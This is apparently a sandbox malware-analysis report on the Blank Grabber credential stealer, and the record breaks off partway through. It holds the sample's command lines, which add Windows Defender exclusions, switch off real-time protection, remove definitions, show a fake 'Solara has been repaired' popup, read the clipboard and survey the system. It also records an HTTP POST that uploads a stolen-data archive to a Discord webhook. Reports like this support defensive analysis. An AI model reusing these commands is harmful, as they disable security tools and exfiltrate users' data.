0 | 192.168.2.4 | 49748 | 162.159.128.233 | 443 | 7280 | C:\Users\user\Desktop\cmd.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-23 18:44:35 UTC | 302 | OUT | POST /api/webhooks/1309732604697772032/jYDmGek7yWvABusaZDozvumeMuAZjheHcNL9cOnpMCpam2eP5UOyLvUjSMysvJJlJbg0 HTTP/1.1
Host: discord.com
Accept-Encoding: identity
Content-Length: 699973
User-Agent: python-urllib3/2.2.3
Content-Type: multipart/form-data; boundary=deddcaf575f75e2dd616d5b567df1560
2024-11-23 18:44:35 UTC | 16384 | OUT | Data Raw: 2d 2d 64 65 64 64 63 61 66 35 37 35 66 37 35 65 32 64 64 36 31 36 64 35 62 35 36 37 64 66 31 35 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 84 bb 11 d4 21 04 00 00 01 0f c4 e8 86 33 e8 29 00 46 81 42 d6 35 2e 24 9b f9 44 54 5c df 3f 81 fc f3 44 90 f8 2f 8f d9 f6 4f cc 12 30 7b 08 77 71 14 fd 84 41 e4 a4 de dd 8b 8f 1b 70 4f e9 eb 0f ca 37 ec c9 bf 45 c2 5f 36 38 e4 99 90 bd ad e2 da 75 96 41 01 0f 2c d6 ed 26 c6 de 6a bd b3
Data Ascii: --deddcaf575f75e2dd616d5b567df1560Content-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!!3)FB5.$DT\?D/O0{wqApO7E_68uA,&j
2024-11-23 18:44:40 UTC | 1251 | IN | HTTP/1.1 404 Not Found
Date: Sat, 23 Nov 2024 18:44:40 GMT
Content-Type: application/json
Content-Length: 45
Connection: close
Cache-Control: public, max-age=3600, s-maxage=3600
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1732387481
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8dnofcTgJO77a0qvnY06ZSBgJThFUi8RPU8CzONyuww46HrhNSYoQIulPhbjpsHEv8wynrDDGIVboMnd6LkVRJj0bS6cflMBGGEW9Mg25a0WM87vZtObL%2FuVdqpj"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Set-Cookie: __cfruid=bfbee4d8f0c66307eb752299893c7bde277a9e1d-1732387480; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: _cfuvid=r8z8dclj1LJ.4o5SqnVjdAiCBtWH7bkTOCEb1MOHljw-1732387480233-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8e734fba9c4d8c7e-EWR



Target ID: 0
Start time: 13:44:00
Start date: 23/11/2024
Path: C:\Users\user\Desktop\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\cmd.exe"
Imagebase: 0x7ff70aef0000
File size: 6'263'156 bytes
MD5 hash: B2FE874C2E11C56EDF05C5250A8C966F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1701296843.00000162C4354000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1701296843.00000162C4352000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

                                                                                                                                                                                                                                    Target ID:1
                                                                                                                                                                                                                                    Start time:13:44:01
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\cmd.exe"
                                                                                                                                                                                                                                    Imagebase:0x7ff70aef0000
                                                                                                                                                                                                                                    File size:6'263'156 bytes
                                                                                                                                                                                                                                    MD5 hash:B2FE874C2E11C56EDF05C5250A8C966F
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2096102942.000001C916489000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2098275549.000001C916C2C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2090937481.000001C917404000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                                                    Start time:13:44:03
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                                    Start time:13:44:03
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                                    Start time:13:44:03
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                                    Start time:13:44:03
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Solara has been repaired.', 0, 'Solara | Repaired', 48+16);close()""
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                                    Start time:13:44:03
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                                    Start time:13:44:03
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                                    Start time:13:44:03
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr'"
                                                                                                                                                                                                                                    Imagebase:0x310000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                                                    Start time:13:44:03
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                                                    Start time:13:44:03
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                                                    Start time:13:44:03
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Solara has been repaired.', 0, 'Solara | Repaired', 48+16);close()"
                                                                                                                                                                                                                                    Imagebase:0x7ff727d80000
                                                                                                                                                                                                                                    File size:14'848 bytes
                                                                                                                                                                                                                                    MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                                                                    Start time:13:44:03
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr'
                                                                                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                                                                    Start time:13:44:03
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'
                                                                                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                                                    Start time:13:44:06
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                                                                    Start time:13:44:06
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:16
                                                                                                                                                                                                                                    Start time:13:44:06
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                                                                    Start time:13:44:06
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

Target ID:18
Start time:13:44:06
Start date:23/11/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FO LIST
Imagebase:0x7ff73cba0000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:13:44:07
Start date:23/11/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FO LIST
Imagebase:0x7ff73cba0000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:13:44:07
Start date:23/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Imagebase:0x7ff613350000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:13:44:07
Start date:23/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Imagebase:0x7ff613350000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:13:44:07
Start date:23/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:0x7ff613350000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:13:44:07
Start date:23/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:0x7ff613350000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:13:44:07
Start date:23/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:13:44:07
Start date:23/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:13:44:07
Start date:23/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:13:44:07
Start date:23/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:13:44:07
Start date:23/11/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:0x7ff6eef20000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:29
Start time:13:44:08
Start date:23/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
Imagebase:0x7ff613350000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:30
Start time:13:44:08
Start date:23/11/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FO LIST
Imagebase:0x7ff73cba0000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:31
Start time:13:44:08
Start date:23/11/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Imagebase:0x7ff65aee0000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:32
Start time:13:44:08
Start date:23/11/2024
Path:C:\Windows\System32\tree.com
Wow64 process (32bit):false
Commandline:tree /A /F
Imagebase:0x7ff6934b0000
File size:20'992 bytes
MD5 hash:9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:33
Start time:13:44:08
Start date:23/11/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell Get-Clipboard
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:34
Start time:13:44:08
Start date:23/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:35
Start time:13:44:08
Start date:23/11/2024
Path:C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):false
Commandline:systeminfo
Imagebase:0x7ff6bf120000
File size:110'080 bytes
MD5 hash:EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:37
Start time:13:44:10
Start date:23/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:0x7ff613350000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:38
Start time:13:44:10
Start date:23/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
